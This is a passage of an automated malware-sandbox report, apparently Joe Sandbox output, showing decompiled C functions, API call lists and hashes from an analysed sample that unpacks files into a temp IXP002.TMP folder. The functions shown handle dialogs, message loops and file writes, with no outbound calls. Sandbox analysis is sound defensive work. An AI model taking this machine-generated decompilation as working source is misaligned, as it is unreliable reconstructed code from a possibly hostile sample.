                                                                                                                                                                                                    				_t37 =  !_t36;
                                                                                                                                                                                                    				 *0x138008 = _t37;
                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x0013715d
                                                                                                                                                                                                    0x00137161
                                                                                                                                                                                                    0x00137165
                                                                                                                                                                                                    0x00137178
                                                                                                                                                                                                    0x00137182
                                                                                                                                                                                                    0x0013718e
                                                                                                                                                                                                    0x00137197
                                                                                                                                                                                                    0x001371a0
                                                                                                                                                                                                    0x001371b1
                                                                                                                                                                                                    0x001371b8
                                                                                                                                                                                                    0x001371c4
                                                                                                                                                                                                    0x001371c7
                                                                                                                                                                                                    0x001371cb
                                                                                                                                                                                                    0x001371d5
                                                                                                                                                                                                    0x001371da
                                                                                                                                                                                                    0x001371da
                                                                                                                                                                                                    0x001371dc
                                                                                                                                                                                                    0x001371dc
                                                                                                                                                                                                    0x001371e2
                                                                                                                                                                                                    0x001371e5
                                                                                                                                                                                                    0x001371ee

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00137182
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00137191
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0013719A
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 001371A3
                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 001371B8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                                    • Opcode ID: cebd3e2cbef2ba98fd832ac5e1a51f83cf4147486555c304e46e3ccbf0238959
                                                                                                                                                                                                    • Instruction ID: 20570957400ee8bb113e7f71ddddb7e351cc52b8c899723fcf59dbce6e59f059
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cebd3e2cbef2ba98fd832ac5e1a51f83cf4147486555c304e46e3ccbf0238959
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9112EB1D05208DFCB14DFB8DA48A9EBBF4FF58315FA14855E805E7650EB309B458B41
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E001319E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t11;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                    				struct HWND__* _t34;
                                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __edi;
                                                                                                                                                                                                    				_t27 = __ebx;
                                                                                                                                                                                                    				_t11 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                    				_t34 = _a4;
                                                                                                                                                                                                    				_t14 = _a8 - 0x110;
                                                                                                                                                                                                    				if(_t14 == 0) {
                                                                                                                                                                                                    					_t32 = GetDesktopWindow();
                                                                                                                                                                                                    					E001343D0(_t34, _t15);
                                                                                                                                                                                                    					_v520 = 0;
                                                                                                                                                                                                    					LoadStringA( *0x139a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                    					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                    					MessageBeep(0xffffffff);
                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if(_t14 != 1) {
                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t32 = _a12;
                                                                                                                                                                                                    						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							EndDialog(_t34, _t32);
                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                    							_t23 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x001319e0
                                                                                                                                                                                                    0x001319e0
                                                                                                                                                                                                    0x001319eb
                                                                                                                                                                                                    0x001319f2
                                                                                                                                                                                                    0x001319f9
                                                                                                                                                                                                    0x001319fc
                                                                                                                                                                                                    0x00131a01
                                                                                                                                                                                                    0x00131a2a
                                                                                                                                                                                                    0x00131a2e
                                                                                                                                                                                                    0x00131a3e
                                                                                                                                                                                                    0x00131a4f
                                                                                                                                                                                                    0x00131a62
                                                                                                                                                                                                    0x00131a6a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131a03
                                                                                                                                                                                                    0x00131a06
                                                                                                                                                                                                    0x00131a20
                                                                                                                                                                                                    0x00131a20
                                                                                                                                                                                                    0x00131a08
                                                                                                                                                                                                    0x00131a08
                                                                                                                                                                                                    0x00131a14
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131a16
                                                                                                                                                                                                    0x00131a18
                                                                                                                                                                                                    0x00131a70
                                                                                                                                                                                                    0x00131a72
                                                                                                                                                                                                    0x00131a72
                                                                                                                                                                                                    0x00131a14
                                                                                                                                                                                                    0x00131a06
                                                                                                                                                                                                    0x00131a81

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00131A18
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00131A24
                                                                                                                                                                                                    • LoadStringA.USER32(?,?,00000200), ref: 00131A4F
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00131A62
                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 00131A6A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1273765764-0
                                                                                                                                                                                                    • Opcode ID: f079dfcc4246a15b2fbc5f5fb0165fb79ca86f4a2b521afca42efaac88b0ff4b
                                                                                                                                                                                                    • Instruction ID: 277b51ca7e95195ad516b2a6f1f766639c28b30650e097ff02f580488e11033d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f079dfcc4246a15b2fbc5f5fb0165fb79ca86f4a2b521afca42efaac88b0ff4b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D811C031601159AFDB10EF68EE08AEE77B8FF49301F508154FA56D3590DB30AE81DB95
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                    			E001363C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				long _v272;
                                                                                                                                                                                                    				void* _v276;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                    				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t15 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                    				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_v276 = _a16;
                                                                                                                                                                                                    				_t37 = 1;
                                                                                                                                                                                                    				E00131781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                    				E0013658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                    				_t28 = 0;
                                                                                                                                                                                                    				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                    				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                    					_t28 = _a4;
                                                                                                                                                                                                    					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                    						 *0x139124 = 0x80070052;
                                                                                                                                                                                                    						_t37 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					CloseHandle(_t39);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					 *0x139124 = 0x80070052;
                                                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                    			}















                                                                                                                                                                                                    0x001363cb
                                                                                                                                                                                                    0x001363d2
                                                                                                                                                                                                    0x001363d8
                                                                                                                                                                                                    0x001363ea
                                                                                                                                                                                                    0x001363f3
                                                                                                                                                                                                    0x00136401
                                                                                                                                                                                                    0x00136402
                                                                                                                                                                                                    0x00136410
                                                                                                                                                                                                    0x00136415
                                                                                                                                                                                                    0x00136433
                                                                                                                                                                                                    0x00136438
                                                                                                                                                                                                    0x00136449
                                                                                                                                                                                                    0x00136463
                                                                                                                                                                                                    0x0013646d
                                                                                                                                                                                                    0x00136477
                                                                                                                                                                                                    0x00136477
                                                                                                                                                                                                    0x0013647a
                                                                                                                                                                                                    0x0013643a
                                                                                                                                                                                                    0x0013643a
                                                                                                                                                                                                    0x00136444
                                                                                                                                                                                                    0x00136444
                                                                                                                                                                                                    0x00136492

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0013642D
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0013645B
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0013647A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 001363EB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                    • API String ID: 1065093856-3290032183
                                                                                                                                                                                                    • Opcode ID: 5655f44eaddec79c1eff19e726d47f2be94785cdef58e2691cccf93409512605
                                                                                                                                                                                                    • Instruction ID: 7a4f4c0784385cc28b7325ead8a1800912059719081180a9608984dc8c73988d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5655f44eaddec79c1eff19e726d47f2be94785cdef58e2691cccf93409512605
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F421D2B1A00218ABDB10DF25DC85FEB776CEB54324F0041A9F585A3280DBB05DC58FA4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E001347E0(intOrPtr* __ecx) {
                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                    				void _t24;
                                                                                                                                                                                                    				struct HWND__* _t25;
                                                                                                                                                                                                    				struct HWND__* _t26;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                    				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                    					_t22 = _t33;
                                                                                                                                                                                                    					_t27 = _t22 + 1;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t6 =  *_t22;
                                                                                                                                                                                                    						_t22 = _t22 + 1;
                                                                                                                                                                                                    					} while (_t6 != 0);
                                                                                                                                                                                                    					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                    					 *_t34 = _t24;
                                                                                                                                                                                                    					if(_t24 != 0) {
                                                                                                                                                                                                    						_t28 = _t33;
                                                                                                                                                                                                    						_t19 = _t28 + 1;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t9 =  *_t28;
                                                                                                                                                                                                    							_t28 = _t28 + 1;
                                                                                                                                                                                                    						} while (_t9 != 0);
                                                                                                                                                                                                    						E00131680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                    						_t11 =  *0x1391e0; // 0x3078e20
                                                                                                                                                                                                    						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                    						 *0x1391e0 = _t34;
                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t25 =  *0x138584; // 0x0
                                                                                                                                                                                                    					E001344B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                    					LocalFree(_t34);
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t26 =  *0x138584; // 0x0
                                                                                                                                                                                                    				E001344B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                    			}















                                                                                                                                                                                                    0x001347e8
                                                                                                                                                                                                    0x001347f0
                                                                                                                                                                                                    0x001347f4
                                                                                                                                                                                                    0x0013480f
                                                                                                                                                                                                    0x00134811
                                                                                                                                                                                                    0x00134814
                                                                                                                                                                                                    0x00134814
                                                                                                                                                                                                    0x00134816
                                                                                                                                                                                                    0x00134817
                                                                                                                                                                                                    0x00134829
                                                                                                                                                                                                    0x0013482b
                                                                                                                                                                                                    0x0013482f
                                                                                                                                                                                                    0x0013484f
                                                                                                                                                                                                    0x00134852
                                                                                                                                                                                                    0x00134855
                                                                                                                                                                                                    0x00134855
                                                                                                                                                                                                    0x00134857
                                                                                                                                                                                                    0x00134858
                                                                                                                                                                                                    0x00134860
                                                                                                                                                                                                    0x00134865
                                                                                                                                                                                                    0x0013486a
                                                                                                                                                                                                    0x0013486f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134876
                                                                                                                                                                                                    0x00134831
                                                                                                                                                                                                    0x00134841
                                                                                                                                                                                                    0x00134847
                                                                                                                                                                                                    0x0013480b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013480b
                                                                                                                                                                                                    0x001347f6
                                                                                                                                                                                                    0x00134806
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00134E6F), ref: 001347EA
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00134823
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00134847
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00134851
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                    • API String ID: 359063898-3290032183
                                                                                                                                                                                                    • Opcode ID: 265935efbee25d967d04e6638a4269e48c407ab2bafd4f1c1f73a4b30aa7fa1d
                                                                                                                                                                                                    • Instruction ID: 5f492cbdb850fb9b5527773c2c65aa7fec4b9c06923af6338d983fd7adc38052
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 265935efbee25d967d04e6638a4269e48c407ab2bafd4f1c1f73a4b30aa7fa1d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD1121B9604741AFE7288F64AC18F723B5AEB85310F0485A9FA829B741DB35EC068660
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                    			E00136517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                    				struct HRSRC__* _t6;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				struct HINSTANCE__* _t23;
                                                                                                                                                                                                    				int _t24;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t23 =  *0x139a3c; // 0x130000
                                                                                                                                                                                                    				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                    				if(_t6 == 0) {
                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                    					E001344B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					_t24 = _a16;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                    							_push(_a12);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                    						FreeResource(_t21);
                                                                                                                                                                                                    						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t24;
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x0013651f
                                                                                                                                                                                                    0x0013652a
                                                                                                                                                                                                    0x00136534
                                                                                                                                                                                                    0x0013656b
                                                                                                                                                                                                    0x00136577
                                                                                                                                                                                                    0x0013657c
                                                                                                                                                                                                    0x00136536
                                                                                                                                                                                                    0x0013653e
                                                                                                                                                                                                    0x00136542
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136544
                                                                                                                                                                                                    0x00136547
                                                                                                                                                                                                    0x0013654c
                                                                                                                                                                                                    0x00136549
                                                                                                                                                                                                    0x00136549
                                                                                                                                                                                                    0x00136549
                                                                                                                                                                                                    0x0013655e
                                                                                                                                                                                                    0x00136560
                                                                                                                                                                                                    0x00136569
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136569
                                                                                                                                                                                                    0x00136542
                                                                                                                                                                                                    0x00136587

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00130000,000007D6,00000005), ref: 0013652A
                                                                                                                                                                                                    • LoadResource.KERNEL32(00130000,00000000,?,?,00132EE8,00000000,001319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00136538
                                                                                                                                                                                                    • DialogBoxIndirectParamA.USER32(00130000,00000000,00000547,001319E0,00000000), ref: 00136557
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00132EE8,00000000,001319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00136560
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1214682469-0
                                                                                                                                                                                                    • Opcode ID: a19ce6203e6d314657e5dbb3984fe1c57e3f8083adaf69ef6ba52f8da243a23a
                                                                                                                                                                                                    • Instruction ID: dd32ff8855ad578b20d1b3422853ba0d11cbd05fdcaa3d5bb9f0ef07dfd35760
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a19ce6203e6d314657e5dbb3984fe1c57e3f8083adaf69ef6ba52f8da243a23a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5014472200609BBCB105FA9AC48DBB7A6CEF893B0F004139FE50E3190D7B1CC50CAA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00133680(void* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				struct tagMSG _v36;
                                                                                                                                                                                                    				int _t8;
                                                                                                                                                                                                    				struct HWND__* _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v8 = __ecx;
                                                                                                                                                                                                    				_t16 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							if(_v36.message != 0x12) {
                                                                                                                                                                                                    								DispatchMessageA( &_v36);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t16 = 1;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                    						} while (_t8 != 0);
                                                                                                                                                                                                    						if(_t16 == 0) {
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					break;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x0013368c
                                                                                                                                                                                                    0x0013368f
                                                                                                                                                                                                    0x00133691
                                                                                                                                                                                                    0x0013369f
                                                                                                                                                                                                    0x001336a7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001336ba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001336bc
                                                                                                                                                                                                    0x001336bc
                                                                                                                                                                                                    0x001336c0
                                                                                                                                                                                                    0x001336cb
                                                                                                                                                                                                    0x001336c2
                                                                                                                                                                                                    0x001336c4
                                                                                                                                                                                                    0x001336c4
                                                                                                                                                                                                    0x001336da
                                                                                                                                                                                                    0x001336e0
                                                                                                                                                                                                    0x001336e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001336e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001336ba
                                                                                                                                                                                                    0x001336ed

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0013369F
                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001336B2
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 001336CB
                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001336DA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2776232527-0
                                                                                                                                                                                                    • Opcode ID: 316b7b4e330b036e7dea65af11303a2dcf08472a8c326c8ab2a1bedd0e19ca07
                                                                                                                                                                                                    • Instruction ID: 2095d83bc040aa944958f215cf8cde8a4011bb28d729287993963d5c7dc655fa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 316b7b4e330b036e7dea65af11303a2dcf08472a8c326c8ab2a1bedd0e19ca07
